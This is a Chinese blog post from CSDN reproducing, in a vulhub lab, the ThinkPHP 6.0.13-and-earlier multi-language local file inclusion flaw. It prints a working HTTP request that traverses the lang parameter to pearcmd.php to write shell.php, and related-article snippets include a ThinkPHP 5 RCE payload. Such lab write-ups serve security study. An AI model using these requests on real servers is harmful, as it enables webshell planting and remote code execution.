vulhub中ThinkPHP 多语言本地文件包含漏洞复现

最新推荐文章于 2024-09-08 11:36:03 发布
最新推荐文章于 2024-09-08 11:36:03 发布
阅读量513 收藏 1
点赞数 4
分类专栏: vulhub漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136517878
版权

ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件。

环境启动后,访问http://your-ip:8080即可查看到ThinkPHP默认的欢迎页面。

漏洞利用

1.首先,ThinkPHP多语言特性不是默认开启的,所以我们可以尝试包含public/index.php文件来确认文件包含漏洞是否存在:

如果漏洞存在,则服务器会出错,返回500页面。

文件包含漏洞存在的情况下还需要服务器满足下面两个条件才能利用:

  1. PHP环境开启了register_argc_argv

  2. PHP环境安装了pcel/pear

Docker默认的PHP环境恰好满足上述条件,所以我们可以直接使用下面这个数据包来在写shell.php文件

GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0

2.如果服务器返回pearcmd的命令行执行结果,说明漏洞利用成功:

3.此时访问http://your-ip:8080/shell.php即可发现已经成功写入文件:

余生有个小酒馆
关注
专栏目录
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1286
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行。
漏洞复现】CNVD-2022-86535-ThinkphpV6多语言
rm -rf *
01-18 2554
Thinkphp语言模块漏洞远程命令执行
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3675
浅谈一下文件包含之包含pearcmd.php漏洞
利用pearcmd.php和文件包含getshell
m0_59053674的博客
04-23 1459
文章介绍如何利用pearcmd来getshel,并对payload的构造格式提出了一点想法
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6
最新发布
gan_zi_ge的博客
09-08 2341
*漏洞原理:**ThinkPHP是在国使用极为广泛的PHP开发框架。在其版本5,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在国使用极为广泛的PHP开发框架。
Docker php文件本地包含--pearcmd.php利用
banliyaoguai的博客
08-30 1196
docker包含日志文件,基本不可能,就以我自身的一个项目来说,在尝试包含日志文件时发现,客户将他的日志文件从定向到了设备文件,而php没有包含设备文件的权限然后我们就想如何包含,发现客户的文件目录里有一个phpinfo(),然后可以使用phpinfo实现临时文件的包含。但是这个包含的成功率经测试不是很高。所以我们这里再说一个新招。
pearcmd文件包含漏洞
Elite的博客
01-20 1624
pecl是PHP用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 6137
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像pear都会被默认安
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 724
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
2024年最新ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新我把所有网络安全框架整理成了PDF
2301_79985178的博客
05-06 1238
*漏洞原理:**ThinkPHP是在国使用极为广泛的PHP开发框架。在其版本5,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在国使用极为广泛的PHP开发框架。
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 942
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
CTF的pearcmd.php文件包含
XINO
09-27 1088
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
Vulhub-thinkphp
Mccc_li的博客
08-09 591
文章目录ThinkPHP 2.x 任意代码执行漏洞漏洞原理 ThinkPHP 2.x 任意代码执行漏洞 漏洞原理 ThinkPHP 2.x版本,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2640
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
pearcmd.php文件包含,相关CTF例题
m0_63716101的博客
11-27 1257
pear的默认安装路径为/usr/local/lib/php/pear.php,在命令行可以使用pear和/usr/local/lib/php/pear.php运行,如果存在文件包含漏洞,则可以直接运行此命令,下面我们介绍一下register_argc_argv选项,如果此选项打开,则此时用户输入的内容。file后面是pearcmd的默认路径,因为Index.php提示了后面会加php,所以直接/usr/local/lib/php/pearcmd就好了。但他最后会在file后面加个.php,题目提示了。
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1669
是PHP用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
vulhub漏洞ThinkPHP
weixin_45808483的博客
12-02 448
/index.php?s=captcha _method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=pwd
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2861
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
vulhub靶场之thinkphp】——(5-rce)
weixin_57240513的博客
08-07 453
docker-compose ps//查看开启的端口。
thinkphp5.0.24文件包含漏洞
06-08
ThinkPHP 5.0.24版本存在一个文件包含漏洞,也称为“ThinkPHP5.0.24远程代码执行(RCE)漏洞”。这个漏洞源于框架的一个设计缺陷,它允许恶意用户利用特定条件下的参数控制来执行任意文件包含操作,从而可能导致攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值